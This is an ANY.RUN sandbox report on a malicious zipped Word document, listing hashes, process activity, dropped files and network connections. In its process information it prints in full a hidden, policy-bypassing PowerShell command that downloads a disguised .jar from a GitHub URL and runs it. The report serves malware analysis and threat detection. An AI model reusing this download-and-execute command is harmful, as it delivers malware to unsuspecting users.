analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

07_06_19_14_29_34_gelenmail.zip

Full analysis: https://app.any.run/tasks/99c23602-6e30-4372-ae1a-5c5ba15a8df8
Verdict: Malicious activity
Analysis date: July 18, 2019, 11:20:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

298DD5C982724C4BDAA4CE9523581A7C

SHA1:

EE47B1F8E4BA347BDF461954C68847E645311B60

SHA256:

BA3D805C05B15BCE2F84A16A8C4D06B74C1CD2415B78B17FEB96602F2BD1DA03

SSDEEP:

1536:mKVQi21V5bjfEK5m2me9Dkf+GTnvfr/xgOL+UooboUFXOLBA67S2goWCi:E1VB5Rf9DbGTvfrmG+Uo2oUMGG5i

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 4088)
      • EXCEL.EXE (PID: 3968)

    • Executes PowerShell scripts

      • CMD.EXE (PID: 3088)

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 3968)

  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 3968)
      • EXCEL.EXE (PID: 3200)

    • Creates files in the user directory

      • powershell.exe (PID: 3660)

  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3200)
      • EXCEL.EXE (PID: 3968)
      • WINWORD.EXE (PID: 4088)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 4088)

    • Manual execution by user

      • WINWORD.EXE (PID: 4088)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: 08_07_2013_23-33_gelenmail.docx
ZipUncompressedSize: 101208
ZipCompressedSize: 98055
ZipCRC: 0x906fcd7a
ZipModifyDate: 2019:07:08 23:35:00
ZipCompression: Unknown (99)
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
7
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs verclsid.exe no specs excel.exe no specs excel.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2932"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\07_06_19_14_29_34_gelenmail.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
4088"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\08_07_2013_23-33_gelenmail.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2560"C:\Windows\system32\verclsid.exe" /S /C {00020820-0000-0000-C000-000000000046} /I {00000112-0000-0000-C000-000000000046} /X 0x5C:\Windows\system32\verclsid.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Extension CLSID Verification Host
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3200"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3968"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3088CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/64865/8oh6hj/gh-pages/w95r265vb8o9np.otf\" ,\" %tmp%\\irs5WQ.jar\") }" & %tmp%\\irs5WQ.jarC:\Windows\system32\CMD.EXEEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3660powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/64865/8oh6hj/gh-pages/w95r265vb8o9np.otf\" ,\" C:\Users\admin\AppData\Local\Temp\\irs5WQ.jar\") }" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 495
Read events
2 006
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
3
Unknown types
5

Dropped files

PID
Process
Filename
Type
4088WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR12D7.tmp.cvr
MD5:
SHA256:
4088WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DDE06C5C.png
MD5:
SHA256:
3200EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR3860.tmp.cvr
MD5:
SHA256:
3968EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR3D23.tmp.cvr
MD5:
SHA256:
3660powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q9C1N4MA6HJG6OWHUMUN.temp
MD5:
SHA256:
4088WINWORD.EXEC:\Users\admin\Desktop\~$_07_2013_23-33_gelenmail.docxpgc
MD5:B64D44E277E0AD26968D5A92C69C0C56
SHA256:15AC686A2EC0EB641EE821F2E74C2FE949EBA94424E430B8C66815A84863A277
4088WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\08_07_2013_23-33_gelenmail.docx.LNKlnk
MD5:A5D01BE235A34E802C67635EF67D4672
SHA256:D6B5241699479D308EA33897F281ECBF9BD8227E1D8B5A13F5BDC286A3527F2F
4088WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC92AA07.emfemf
MD5:3C840A930CF7E52977B4C0E08C7AEC74
SHA256:A8BCBBEEFD99A53EFC3579989E88E18A04CC537BD79E3775D21BDF7585B71C5C
3660powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:47388A8B771AD359484FBDBC4C2AF508
SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0
2932WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2932.39384\08_07_2013_23-33_gelenmail.docxdocument
MD5:6E64370C801AAF939EA59C64D2CEAA21
SHA256:5D7BA29167BBF3E2B653A036FEA3A23F45518B1D2642175419749E60C8252602
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3660
powershell.exe
151.101.0.133:443
raw.githubusercontent.com
Fastly
US
malicious

DNS requests

Domain
IP
Reputation
raw.githubusercontent.com
  • 151.101.0.133
  • 151.101.64.133
  • 151.101.128.133
  • 151.101.192.133
shared

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
07_06_19_14_29_34_gelenmail.zip